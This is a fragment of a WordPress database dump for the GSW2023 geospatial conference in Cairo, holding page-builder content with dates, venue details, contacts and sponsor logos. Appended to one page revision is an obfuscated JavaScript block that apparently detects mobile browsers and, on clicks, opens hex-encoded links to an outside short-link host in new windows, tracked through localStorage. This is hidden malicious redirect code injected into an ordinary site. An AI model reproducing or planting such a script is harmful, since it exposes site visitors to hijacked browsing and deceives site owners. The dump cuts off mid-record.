width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][/vc_column][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-23 20:52:12','2023-06-23 20:52:12','',3066,'https://gsw2023.com/?p=4758',0,'revision','',0),
(4759,4,'2023-06-23 20:57:08','2023-06-23 20:57:08','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: 